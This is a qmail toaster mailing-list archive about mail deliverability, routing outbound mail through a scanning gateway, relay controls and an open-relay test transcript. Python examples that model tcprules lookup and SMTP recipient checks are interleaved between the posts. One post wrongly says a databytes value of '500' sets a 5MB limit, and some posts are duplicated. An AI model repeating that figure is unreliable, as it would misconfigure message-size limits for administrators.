It seems that they have not implemented SPF as of yet, because we have SPF records on all of our domains. I will try the solution you posted and will get back to you guys. It seems that Yahoo does not have ANY contact information with their postmaster department, as customer care has no clue what an SMTP server even is!

Peter

Bill Shupp wrote:
> Peter Maag wrote:
> > Hey All,
> >
> > Recently for some reason our customers have been complaining that mail forwarded or sent to their Yahoo accounts is being automatically deposited into their Bulk Mail folders. Contacting Yahoo! has been an uphill battle, and after numerous phone calls and e-mails to try and get to talk to someone with a clue we are giving up on them. Each of our SMTP servers has reverse DNS enabled and functioning correctly. We are on clean IPs, and none of the IPs are listed in any RBL or Blacklist.
>
> Have they implemented SPF?
>
> http://spf.pobox.com/faq.html#forwarding
>
> > I would like to leave our current SMTP servers intact and simply have them forward any mail they receive from our clients to yet another SMTP server that we operate on an entirely separate network. This would only be temporary until we get Yahoo to actually tell us what is going on. How would you accomplish this with qmail?
>
> put:
>
> :ipoftempsmtpserver
>
> in /var/qmail/control/smtproutes and hup qmail-send (replacing ipoftempsmtpserver with the actual IP). And make sure that the new smtp server has your current smtp server setup as RELAYCLIENT.
>
> Regards,
>
> Bill
Re: [toaster] Suggestions for improving performance
Darrell,

I wasn't that specific in my original post, and for that I apologize. Our setup is configured like I mentioned, except for the fact that our primary mail server (the one with the vpopmail accounts) is configured as a backup MX in our DNS zones. This way if our primary scanner goes down mail is still delivered correctly.

However, having our primary mail server as a secondary MX in DNS opened up a few other problems... It seems that a lot of viruses and bulk mailer programs are written to deliver their nasty mail to all MX records for a domain, or simply deliver the mail to the backup MX servers. It looks like they realized what we are trying to do, get the scanning off of our primary mail server and onto a dumb machine that simply scans e-mails all day.

The solution is pretty elegant really, but is not entirely scalable. With help from Bill, we figured out how to scan messages selectively based on where they were coming from. Any messages being sent from our scanner machine are not scanned by our primary mail server, as, obviously, they have been scanned by the scanner machine. Now, if the primary mail server gets a message from somewhere else besides the scanner machine we set QMAILQUEUE to qmailscanner and the message is scanned. We still benefit from improved performance, and do not have problems delivering mail to picky ISP's like AOL.

The downside to this system is that we need to keep spamassassin/clamav current on two machines, but we have noticed a good performance increase with this system... As 99% of all legitimate e-mails are sent to the MX record with the highest priority, which is our scanner machine.

Hope this helps,

Peter

Darrell Strong wrote:
> Peter,
>
> I was reading your post from the Shupp toaster page (see below) and was wondering how you resolved the aol problem that is associated with having your gateway email server on your mx record and not your true email server. I have my setup just like you mentioned below. It works great but I just realized that AOL is sending all incoming mail we are sending it to the aol users' spam folder. Evidently AOL is assuming all incoming mail from my mailserver is spam because it is originating from my mail server which is no longer at my mx record ip address. Therefore there is no reverse dns record for it. Outgoing mail goes out directly from my mailserver, bypassing the gateway. Did you have this problem? Should I route all outgoing mail back thru the gateway? Any help you could provide would be appreciated.
>
> Thanks
>
> "Jeff,
>
> We had a similar problem, and our bottleneck was SpamAssassin and Clam Scanner. We ended up putting SpamAssassin and Clamd on a separate machine that simply scanned the incoming messages and passed them onto the primary mail machine that housed the vpopmail accounts, etc. All you need to do is install Bill's toaster on a second machine with Qmailscanner, SpamAssassin, etc, etc. and then setup that machine to forward all mail to your primary box in /var/qmail/control/smtproutes. Works like a charm, just make sure DNS points to the scanning server in the MX route.
>
> Peter"
>
> Darrell Strong
> Technology Coordinator
> Haddon Heights Public Schools
> (856) 547-0521
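Both the "scan selectively based on where the message comes from" setup above and the open-relay concern raised earlier in the "not sending" thread live in the same place: the tcp.smtp rules that tcpserver applies per connecting address, which decide whether RELAYCLIENT is set and which QMAILQUEUE qmail-smtpd inherits. The following is an added example, not code from the thread or from ucspi-tcp: it parses a tcprules-style file, resolves the rule a given source address would hit (exact address first, then shorter dotted prefixes, then the catch-all, which is tcpserver's lookup order for IP-based rules; host-name `=` rules are left out of this model), and audits for a catch-all rule that grants relaying. The two rule files are constructed; 192.168.2.50 stands in for the scanning gateway and the qmail-scanner wrapper path is assumed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed tcp.smtp for the primary (vpopmail) server described above.
SAMPLE_TCP_SMTP = """
# loopback may relay
127.:allow,RELAYCLIENT=""
# the scanner box: already scanned there, so hand straight to qmail-queue
192.168.2.50:allow,RELAYCLIENT="",QMAILQUEUE="/var/qmail/bin/qmail-queue"
# everyone else: no relaying, and run the scanner on what they submit
:allow,QMAILQUEUE="/var/qmail/bin/qmail-scanner-queue.pl"
"""

# Constructed: the misconfiguration an open relay typically comes down to.
OPEN_RELAY_TCP_SMTP = """
:allow,RELAYCLIENT=""
"""

ENV_RE = re.compile(r'(\w+)="([^"]*)"')   # VAR="value" assignments in a rule


@dataclass
class Rule:
    address: str                  # "", "127.", "192.168.2.50", ...
    allow: bool
    env: Dict[str, str] = field(default_factory=dict)


def parse_tcprules(text: str) -> List[Rule]:
    """Parse the text form tcprules reads (address:allow|deny[,VAR="value"...])."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        address, _, instruction = line.partition(":")
        allow = instruction.split(",", 1)[0] == "allow"
        rules.append(Rule(address, allow, dict(ENV_RE.findall(instruction))))
    return rules


def candidates(ip: str) -> List[str]:
    """Lookup keys in tcpserver's order: exact IP, shorter dotted prefixes, then the default."""
    octets = ip.split(".")
    keys = [ip]
    for n in range(len(octets) - 1, 0, -1):
        keys.append(".".join(octets[:n]) + ".")
    keys.append("")
    return keys


def match_rule(rules: List[Rule], ip: str) -> Optional[Rule]:
    by_addr: Dict[str, Rule] = {}
    for r in rules:
        by_addr.setdefault(r.address, r)      # first definition of an address wins
    for key in candidates(ip):
        if key in by_addr:
            return by_addr[key]
    return None


def env_for(rules: List[Rule], ip: str) -> Dict[str, str]:
    """Environment qmail-smtpd inherits for a connection from ip ({} if denied / unmatched)."""
    r = match_rule(rules, ip)
    return dict(r.env) if r and r.allow else {}


def audit_relay(rules: List[Rule]) -> List[str]:
    """Report rules that hand RELAYCLIENT to every address: that is an open relay."""
    return ["catch-all rule grants RELAYCLIENT: open relay"
            for r in rules if r.allow and r.address == "" and "RELAYCLIENT" in r.env]


if __name__ == "__main__":
    rules = parse_tcprules(SAMPLE_TCP_SMTP)
    for ip in ["192.168.2.50", "192.168.2.1", "203.0.113.7"]:
        print(ip, env_for(rules, ip))
    print("audit:", audit_relay(parse_tcprules(OPEN_RELAY_TCP_SMTP)))
```

Two things the model makes visible: the scanner's address is the only one that gets the plain qmail-queue, so a message from anywhere else (including a NAT gateway such as the 192.168.2.1 in Noel's log, which here falls through to the catch-all) is scanned and cannot relay; and a rule granting RELAYCLIENT to a prefix covers every host that connects from that range, so the prefix chosen should be no wider than the machines meant to relay.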
Re: [toaster] Suggestions for improving performance
Darrell, Honestly I am not sure how you would go about sending e-mails through your scanning machine.Hopefully someone else from the list will respond with the answer. Peter [EMAIL PROTECTED] wrote: Peter, thanks for getting back to me so quickly. I may need to reroute outgoing AOL mail thru the gateway email server. I attempted this yesterday by creating an smtproutes file and adding "aol.com:my.gtw.ip.addr" . The gateway sent me a message back telling me that: Remote host said: 553 sorry, that domain isn't in my list of allowed rcpthosts; no valid cert for gatewaying (#5.7.1) I guess I need to refigure out how to tell the gateway to send msgs from aol on to their destination, which isn't on that machine. Do you know a simple way to do that from the gateway? Do I need to edit the rcpthosts file? This would seem to be opening a can of worms but I'm not sure. Any help would be appreciated. Thanks Darrell Strong Darrell, I wasn't that specific in my original post, and for that I apologize. Our setup is configured like I mentioned, except for the fact that our primary mail server(the one with the vpopmail accounts) is configured as a backup MX in our DNS zones. This way if our primary scanner goes down mail is still delivered correctly. However, having our primary mail server as a secondary MX in DNS opened up a few other problems...It seems that a lot of viruses and bulk mailer programs are written to deliver their nasty mail to all MX records for a domain, or simply deliver the mail to the backup MX servers. It looks like they realized what we are trying to do, get the scanning off of our primary mail server and onto a dumb machine that simply scans e-mails all day. The solution is pretty elegant really, but is not entirely scalable. With help from Bill, we figured out how to scan messages selectively based on where they were coming from. 
Any messages being sent from our scanner machine are not scanned by our primary mail server, as, obviously, they have been scanned by the scanner machine. Now, if the primary mail server gets a message from somewhere else besides the scanner machine we set QMAILQUEUE to qmailscanner and the message is scanned. We still benefit from improved performance, and do not have problems delivering mail to picky ISPs like AOL. The downside to this system is that we need to keep spamassassin/clamav current on two machines, but we have noticed a good performance increase with this system... As 99% of all legitimate e-mails are sent to the MX record with the highest priority, which is our scanner machine. Hope this helps, Peter Darrell Strong wrote: Peter, I was reading your post from the Shupp toaster page (see below) and was wondering how you resolved the AOL problem that is associated with having your gateway email server on your MX record and not your true email server. I have my setup just like you mentioned below. It works great but I just realized that AOL is sending all incoming mail we are sending it to the AOL users' spam folder. Evidently AOL is assuming all incoming mail from my mailserver is spam because it is originating from my mail server, which is no longer at my MX record IP address. Therefore there is no reverse DNS record for it. Outgoing mail goes out directly from my mailserver, bypassing the gateway. Did you have this problem? Should I route all outgoing mail back thru the gateway? Any help you could provide would be appreciated. Thanks " Jeff, We had a similar problem, and our bottleneck was SpamAssassin and Clam Scanner. We ended up putting SpamAssassin and Clamd on a separate machine that simply scanned the incoming messages and passed them on to the primary mail machine that housed the vpopmail accounts, etc. All you need to do is install Bill's toaster on a second machine with Qmailscanner, SpamAssassin, etc, etc. 
and then set up that machine to forward all mail to your primary box in /var/qmail/control/smtproutes. Works like a charm, just make sure DNS points to the scanning server in the MX route. Peter" Darrell Strong Technology Coordinator Haddon Heights Public Schools (856) 547-0521 Darrell Strong Technology Coordinator Haddon Heights Public Schools 856-547-0521
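The selective scanning Peter describes is decided by the tcp.smtp rules that tcpserver hands to qmail-smtpd: the scanner's address gets a rule without QMAILQUEUE, everyone else gets the default rule that sets it. The following is an added example, not code from the toaster, qmail or ucspi-tcp: it parses a constructed tcp.smtp and emulates tcpserver's rule selection (exact address, then shorter dotted prefixes, then the default ":" rule) so you can check which environment a connecting address will get before compiling the file with tcprules. The scanner address 192.0.2.10, the outside address 203.0.113.5 and the qmail-scanner path are assumptions; hostname ("=") rules are not modelled, and values containing ":" or "," are not handled.

```python
"""Emulate tcpserver's tcp.smtp rule selection for a connecting address.

Added example; not part of the toaster, qmail or ucspi-tcp. The rule file
below is constructed: 192.0.2.10 stands in for the scanner machine and the
qmail-scanner path is assumed.
"""
import re

TCP_SMTP = """\
# scanner box (constructed address): its mail is already scanned, no QMAILQUEUE
192.0.2.10:allow
# localhost may relay (the line the toaster installs)
127.0.0.1:allow,RELAYCLIENT=
# everyone else is scanned on the way into the queue (qmail-scanner path assumed)
:allow,QMAILQUEUE="/var/qmail/bin/qmail-scanner-queue.pl"
"""

RANGE_RE = re.compile(r"(\d+\.\d+\.\d+\.)(\d+)-(\d+)")


def parse_rules(text):
    """Return [(address_pattern, action, env)] in file order.

    Accepts the tcprules forms: exact address, prefix ending in '.',
    a last-octet range such as 1.2.3.10-20 (expanded), and '' (the ':' default).
    Environment entries may be bare (VAR=) or quoted (VAR="value").
    """
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pattern, _, instructions = line.partition(":")
        fields = instructions.split(",")
        action, env = fields[0], {}
        for assignment in fields[1:]:
            name, _, value = assignment.partition("=")
            env[name] = value.strip('"')
        m = RANGE_RE.fullmatch(pattern)
        if m:
            prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
            for last in range(lo, hi + 1):
                rules.append((f"{prefix}{last}", action, env))
        else:
            rules.append((pattern, action, env))
    return rules


def lookup(rules, client_ip):
    """Rule tcpserver would pick: exact, then '1.2.3.', '1.2.', '1.', then ''.

    Returns (pattern, (action, env)) or None when no rule matches.
    """
    table = {}
    for pattern, action, env in rules:
        table.setdefault(pattern, (action, env))   # first record wins, as in a cdb lookup
    octets = client_ip.split(".")
    candidates = [client_ip] + [".".join(octets[:n]) + "." for n in (3, 2, 1)] + [""]
    for cand in candidates:
        if cand in table:
            return cand, table[cand]
    return None


def smtpd_decision(client_ip, text=TCP_SMTP):
    """Action and environment qmail-smtpd would inherit for a connection."""
    hit = lookup(parse_rules(text), client_ip)
    if hit is None:
        return {"rule": None, "action": None, "env": {}}
    pattern, (action, env) = hit
    return {"rule": pattern or ":", "action": action, "env": dict(env)}


def will_scan(client_ip, text=TCP_SMTP):
    """True if the connection is allowed and QMAILQUEUE diverts it to the scanner."""
    d = smtpd_decision(client_ip, text)
    return d["action"] == "allow" and "QMAILQUEUE" in d["env"]


def may_relay(client_ip, text=TCP_SMTP):
    """True if the connection is allowed and RELAYCLIENT lets it relay."""
    d = smtpd_decision(client_ip, text)
    return d["action"] == "allow" and "RELAYCLIENT" in d["env"]


if __name__ == "__main__":
    for ip in ("192.0.2.10", "127.0.0.1", "203.0.113.5"):
        print(ip, smtpd_decision(ip), "scan:", will_scan(ip), "relay:", may_relay(ip))
```

Run it against your real tcp.smtp (pass the file's text) after every edit; a default rule that sets QMAILQUEUE but a scanner line that accidentally sits below a broader prefix rule is the kind of ordering slip this catches before tcprules compiles it.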
[toaster] Multiple Domains Same Users
Hey All, Not sure if there is an elegant solution to this with QMail, but I am curious. Say I have a user john who has the e-mail address: [EMAIL PROTECTED] , john registers another domain, domain2.com and would like all e-mail hitting domain2 to be sent to [EMAIL PROTECTED] . But, if john adds more users to domain.com he would like them to propagate over to domain2.com without having to do any more configuration. Any ideas? Peter
Re: [toaster] controlling size of attachments
Jeff, That functionality is built into QMail. Edit/Create the file: /var/qmail/control/databytes Enter a value in there in bytes (i.e. my max is 5MB so it reads: 500) That's it! Peter Jeff Koch wrote: Does anyone know of a patch that would allow the mailserver to reject emails/attachments over a certain size? Best Regards, Jeff Koch
Re: [toaster] Removing Bounced Mail Attachment
Bill, I spent some time researching this a little bit further and found this patch: http://www.qmail.org/qmail-send.mimeheaders.tar.gz Any ideas on how that would affect a toaster installation? Thanks, Peter Bill Shupp wrote: Peter Maag wrote: To The List, We are co-locating our MTA's and have a specific commitment with our colo provider. We are billed on 95%'tile and have been having problems recently with people attempting to send very large attachments to clients on our machines. Recently one user decided it would be a good idea to send a 100MB attachment to a user, the message was bounced using the databytes file in /var/qmail/control. However, I noticed that QMail downloads the message completely, and then bounces it with the attachment. As you can imagine, if multiple users are doing this it tends to raise our bandwidth usage considerably. Do any of you know how to reject an e-mail with a huge attachment, without forwarding the orig. message including the attachment? Thanks for the help, I'm not aware of one. If you find one, let me know and I'll check it out. Regards, Bill
[toaster] Strange SMTP Problem
To The List, I have a new server that is using Bill's 0.5 patch and vpopmail and MySQL. Everything works just great, POP3 authenticates fine, and the username is added to the allowed relay table in the database. I first started noticing problems when I started to try and send mail via the server, after authenticating with POP3. My mail client (Mozilla Thunderbird) seems to pause in Delivering Mail mode. If I don't click cancel, the Delivering Mail window stays up indefinitely. Using netstat on the server shows an open SMTP session from the client, however no new mail is being listed in /var/log/qmail/current ... The message never makes it to the queue. This got me thinking, so I POP'd into the server and then opened up telnet to try and send a message by hand. The server responds as anticipated until I try to exit the data portion of the message with the period (.) command. The server does not end the message there, but continues onto a new line. There is no real way to exit the data portion of the message! Anyone have a problem similar to this one? Thanks, Peter
RE: [toaster] HELP...Toaster only accepting smtp connects from localhost :(
Charles, Who is your ISP? Recently Cox, and others have started blocking outgoing port 25 connections to everything except for their servers. This would be a pretty good explanation as to why it suddenly stopped working. Hope this helps, Peter -Original Message- From: Charles Jones [mailto:[EMAIL PROTECTED] Sent: Thursday, June 19, 2003 10:17 PM To: [EMAIL PROTECTED] Subject: [toaster] HELP...Toaster only accepting smtp connects from localhost :( First I would like to say thanks for putting together such an easy to install package. The directions were concise and the end result was my toaster was up and working great. But somehow...today it isn't. Here are the symptoms: I can connect to anything from localhost, including webmail. I can use sqwebmail to send a message to myself and I get it. I can telnet to localhost 25 and the smtpd responds. However telnetting to it from anywhere outside the network fails (IT WAS WORKING YESTERDAY!). I'm hoping I have provided enough info here that should help someone spot my problem. If you need to know anything else just say the word. 
Here is the contents of my control files, with the actual domain names changed to test:

[EMAIL PROTECTED] [/var/qmail/control]# cat locals
mail.test.com
[EMAIL PROTECTED] [/var/qmail/control]# cat me
mail.test.com
[EMAIL PROTECTED] [/var/qmail/control]# cat virtualdomains
test.com:test.com
test2.com:test2.com
test.info:test.info
anothertest.com:anothertest.com
[EMAIL PROTECTED] [/var/qmail/control]# cat rcpthosts
test1.com:test1.com
test2.com:test2.com
test.info:test.info
anothertest.com:anothertest.com
mail.test.com
[EMAIL PROTECTED] [/var/qmail/control]# cat me
mail.test.com

Running processes:

root 15428 0.0 0.0 1284 308 ? S 21:44 0:00 supervise qmail-send
qmails 15430 0.0 0.0 1336 364 ? S 21:44 0:00 [qmail-send]
qmaill 15431 0.0 0.0 1296 300 ? S 21:44 0:00 /usr/local/bin/multilog t /var/log/qmail
root 15432 0.0 0.0 1284 308 ? S 21:44 0:00 supervise qmail-smtpd
root 15434 0.0 0.0 1284 308 ? S 21:44 0:00 supervise qmail-pop3d
qmaill 15437 0.0 0.0 1296 296 ? S 21:44 0:00 /usr/local/bin/multilog t /var/log/qmail/smtpd
root 15439 0.0 0.0 1300 304 ? S 21:44 0:00 qmail-lspawn ./Maildir/
qmailr 15440 0.0 0.0 1296 292 ? S 21:44 0:00 [qmail-rspawn]
root 15444 0.0 0.0 1280 304 ? S 21:44 0:00 supervise qmail-pop3ds
qmailq 15446 0.0 0.0 1288 316 ? S 21:44 0:00 [qmail-clean]
qmaill 15450 0.0 0.0 1292 296 ? S 21:44 0:00 multilog t /var/log/qmail/pop3d
qmaill 15452 0.0 0.0 1292 296 ? S 21:44 0:00 multilog t /var/log/qmail/pop3ds
root 16068 0.0 0.1 1700 604 pts/3 R 22:06 0:00 grep qmail
root 15429 0.0 0.0 1284 308 ? S 21:44 0:00 supervise log
root 15433 0.0 0.0 1284 308 ? S 21:44 0:00 supervise log
vpopmail 15436 0.0 0.0 1352 472 ? S 21:44 0:00 [tcpserver]
vpopmail 15441 0.0 0.0 1312 328 ? S 21:44 0:00 [tcpserver]
root 15443 0.0 0.0 1280 304 ? S 21:44 0:00 supervise log
root 15445 0.0 0.0 1280 304 ? S 21:44 0:00 supervise log
vpopmail 15451 0.0 0.0 1304 324 ? S 21:44 0:00 [tcpserver]
root 15424 0.0 0.1 2076 1012 ? S 21:44 0:00 /bin/sh /command/svscanboot
root 15426 0.0 0.0 1324 316 ? S 21:44 0:00 svscan /service
root 15427 0.0 0.0 1276 264 ? S 21:44 0:00 readproctitle service errors:

[EMAIL PROTECTED] [/var/qmail/control]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 mail.test.com ESMTP
quit
221 mail.test.com
Connection closed by foreign host.

From external host:

$ telnet mail.test.com 25
Trying x.x.x.x...
(time passes, I give up)
^C
$

[EMAIL PROTECTED] [/var/qmail/control]# cat /etc/tcp.smtp
## To update this database type tcprules tcp.smtp.cdb tcp.smtp.tmp < tcp.smtp
127.0.0.1:allow,RELAYCLIENT=

[EMAIL PROTECTED] [~]# /sbin/iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain acctboth (0 references)
target prot opt source destination
[toaster] Disturbing Logs
Hi All, Have another quick question for the list regarding some outgoing mail I have found in my log files that worries me:

@40003ed69e020fb9a08c new msg 213846
@40003ed69e020fb9db24 info msg 213846: bytes 1218 from [EMAIL PROTECTED] qp 19758 uid 514
@40003ed69e021112f2e4 starting delivery 2368: msg 213846 to remote [EMAIL PROTECTED]
@40003ed69e02111344ec status: local 0/10 remote 1/20
@40003ed69e032b2b5a7c delivery 2368: success: 216.103.215.80_accepted_message./Remote_host_said:_250_2.6.0_[EMAIL PROTECTED]_Queued_mail_for_delivery/
@40003ed69e032b2bcbc4 status: local 0/10 remote 0/20
@40003ed69e032b2bdf4c end msg 213846

The message appears to be coming from my server and is being delivered to an external server that is not being hosted by my server. The local account that QMail is claiming the mail is being sent from is not even a valid POP3 account. Any ideas? Peter Maag
RE: [toaster] Disturbing Logs
Tom, Looking through my logs it seems that a number of domains are doing what the original domain address is doing. In every case the from address (that claims to be from my server) is not a valid address on my server. It seems that someone has found a way to compromise the catchall setting in vpopmail, as the domains in question all have a catchall mail account. Does anyone have any idea how this can be stopped while still having catchall support? Peter -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 29, 2003 6:02 PM To: [EMAIL PROTECTED] Subject: Re: [toaster] Disturbing Logs On Thursday, May 29, 2003, at 05:05 PM, Peter Maag wrote: The message appears to be coming from my server and is being delivered to an external server that is not being hosted by my server. The local account that QMail is claiming the mail is being sent from is not even a valid POP3 account. Try `grep -ri email.domain.com /home/vpopmail/domains` (where the address in your log that the message went to is [EMAIL PROTECTED]) to see if the address in question is a forwarding address on any account you host. It is possible that it's a remote catchall, and could get listed in the log that way. -- Tom Collins [EMAIL PROTECTED]
[toaster] Fighting SPAM
Bill and Others, I am paranoid about people using my server as a relay, and am considering having users use their ISP's SMTP server for outgoing mail. What I would like to do is to monitor the amount of mail the server is sending at any given moment in time. If a user is sending more mail than a predefined limit, I would like to turn off their relay access to the server via IPTables, etc. Currently, the server is running the latest toaster patch, and is only supporting around 15 users. These users use plain POP authentication for checking their mail. Obviously the server is using POP before SMTP to authenticate users. The reason I am concerned is that POP is unencrypted. So, is there any way I can block the amount of mail a user can send in a given amount of time (perhaps 50 messages/hour)? If not, how would you monitor the mail leaving the server? I would think this would be a pretty fair allotment for my average user base. Any suggestions? Thanks again for the help. Peter Maag
Re: [toaster] Open Relay
Bill,

The tool is located at: http://www.abuse.net/relay.html . Here is the output from the actual test (my domain name has been replaced with test.com):

220 mail.test.com ESMTP
HELO www.abuse.net
250 mail.test.com
Relay test 1
RSET
250 flushed
MAIL FROM:[EMAIL PROTECTED]
250 ok
RCPT TO:[EMAIL PROTECTED]
250 ok
DATA
354 go ahead
(message body)
250 ok 1045679681 qp 25778

The e-mail address the e-mail was sent to was on the same server (test.com). The message successfully makes it into my inbox. Thanks again for the help Bill.

Peter

= Original Message From Bill Shupp [EMAIL PROTECTED] =

On Tuesday, February 18, 2003, at 11:06 PM, Peter Maag wrote:

Hey All, Was testing one of my toaster boxes today with Abuse.net's relay tester (http://www.abuse.net/relay)

This is not a valid URL. Where is this tool?

, and it was able to successfully deliver an open relay message to me. (It actually sent a message). Here is the test result:

Connecting to ** for registered user test ...
220 *** ESMTP
HELO www.abuse.net
250 ***
Relay test 1
RSET
250 flushed
MAIL FROM:[EMAIL PROTECTED]
250 ok
RCPT TO:**
250 ok
DATA
354 go ahead
(message body)
250 ok 1045638142 qp 20315

Relay test result
Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY.

The message was indeed delivered to the target address. I reread the toaster, and everything is installed just like it should be except for Courier IMAP, which I don't think should make a difference. My /var/qmail/control/rcpthosts file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that should be echo'd there during install. Any ideas??

Not with the envelope address and hostnames censored. Without that information, it's hard to tell what was tested.
Bill
[toaster] Open Relay
Hey All, Was testing one of my toaster boxes today with Abuse.net's relay tester (http://www.abuse.net/relay), and it was able to successfully deliver an open relay message to me. (It actually sent a message). Here is the test result:

Connecting to ** for registered user test ...
220 *** ESMTP
HELO www.abuse.net
250 ***
Relay test 1
RSET
250 flushed
MAIL FROM:[EMAIL PROTECTED]
250 ok
RCPT TO:**
250 ok
DATA
354 go ahead
(message body)
250 ok 1045638142 qp 20315

Relay test result
Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY.

The message was indeed delivered to the target address. I reread the toaster, and everything is installed just like it should be except for Courier IMAP, which I don't think should make a difference. My /var/qmail/control/rcpthosts file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that should be echo'd there during install. Any ideas?? Thanks for the help. Peter
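The check qmail-smtpd applies at RCPT TO is short: if the connection carries RELAYCLIENT (set by a tcp.smtp rule, or by the POP-before-SMTP relay table), any recipient is accepted; otherwise the recipient's domain must appear in control/rcpthosts, which lists one plain domain per line, a leading dot matching every subdomain. The abuse.net run in this thread sent to an address on test.com, a hosted domain, so a 250 there is correct and does not show relaying; conversely the 553 Darrell's gateway returned for aol.com further up is exactly what qmail-smtpd answers when the recipient domain is foreign and the connecting host has no RELAYCLIENT. The following is an added example, not qmail's own code: it models that decision and replays the transcript with scripted client lines, then a foreign-recipient attempt with and without RELAYCLIENT. The rcpthosts list and envelope addresses are constructed; the 553 text is qmail-smtpd's stock reply (without the TLS patch's "no valid cert for gatewaying" addition); the body after 354 is not replayed.

```python
"""Model of qmail-smtpd's RCPT TO decision, replaying the abuse.net relay test.

Added example, not qmail's own code. Envelope addresses are made up; RCPTHOSTS
is a constructed stand-in for the thread's "hosted domains only" file.
"""

HOSTNAME = "mail.test.com"
RCPTHOSTS = ["test.com", ".test.com"]   # one plain domain per line; ".test.com" = any subdomain
RELAY_REFUSED = "553 sorry, that domain isn't in my list of allowed rcpthosts (#5.7.1)"


def addr_domain(address):
    """Domain of an envelope address, with or without the <> brackets."""
    return address.strip("<>").rpartition("@")[2].lower()


def rcpt_allowed(rcpt, rcpthosts=RCPTHOSTS, relayclient=False):
    """True if qmail-smtpd would accept this recipient.

    RELAYCLIENT (from a tcp.smtp rule or the POP-before-SMTP relay table)
    accepts everything; otherwise the domain must match rcpthosts.
    """
    if relayclient:
        return True
    domain = addr_domain(rcpt)
    for entry in rcpthosts:
        entry = entry.lower()
        if entry.startswith("."):
            if domain.endswith(entry):
                return True
        elif domain == entry:
            return True
    return False


def smtp_session(client_lines, rcpthosts=RCPTHOSTS, relayclient=False):
    """Scripted envelope exchange: returns [(client_line, server_reply), ...]."""
    dialogue = [("", f"220 {HOSTNAME} ESMTP")]
    mail_from, rcpts = None, []
    for line in client_lines:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            reply = f"250 {HOSTNAME}"
        elif verb == "RSET":
            mail_from, rcpts = None, []
            reply = "250 flushed"
        elif verb == "MAIL":
            mail_from, rcpts = arg.partition(":")[2].strip(), []
            reply = "250 ok"
        elif verb == "RCPT":
            rcpt = arg.partition(":")[2].strip()
            if mail_from is None:
                reply = "503 MAIL first (#5.5.1)"
            elif rcpt_allowed(rcpt, rcpthosts, relayclient):
                rcpts.append(rcpt)
                reply = "250 ok"
            else:
                reply = RELAY_REFUSED
        elif verb == "DATA":
            reply = "354 go ahead" if rcpts else "503 RCPT first (#5.5.1)"
        elif verb == "QUIT":
            reply = f"221 {HOSTNAME}"
        else:
            reply = "502 unimplemented (#5.5.1)"
        dialogue.append((line, reply))
    return dialogue


def accepted_recipients(client_lines, **kw):
    """Recipients that got '250 ok' in the scripted session."""
    return [line.partition(":")[2].strip()
            for line, reply in smtp_session(client_lines, **kw)
            if line.upper().startswith("RCPT") and reply == "250 ok"]


def relay_test(target):
    """The abuse.net command sequence with a chosen RCPT target (constructed sender)."""
    return ["HELO www.abuse.net", "RSET", "MAIL FROM:<relaytest@abuse.net>",
            f"RCPT TO:{target}", "DATA", "QUIT"]


if __name__ == "__main__":
    for target, rc in (("<peter@test.com>", False), ("<someone@example.org>", False),
                       ("<someone@example.org>", True)):
        print(f"--- RCPT {target}, RELAYCLIENT={rc}")
        for client, server in smtp_session(relay_test(target), relayclient=rc):
            if client:
                print("C:", client)
            print("S:", server)
```

A real open-relay test therefore needs a RCPT TO for a domain you do not host, from an address that has not just POPed in; a 250 for one of your own domains, as in the transcript above, is the server doing its job. Compare this with the rcpthosts contents shown in the "only accepting smtp connects from localhost" thread: entries written as domain:domain are virtualdomains syntax and will not match a recipient domain here.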
[toaster] POP3S Not Working
Hey all, I installed the toaster per Bill's excellent set of directions. I would like to use POP3S, however all connections to that port get refused. A netstat -nlp shows that POP3S is there and appears to be running. I also turned off iptables on the machine just in case. There is no firewall in front of the machine. So, what is the easiest way I can check to make sure that POP3S is in working order? Thanks for the help. Peter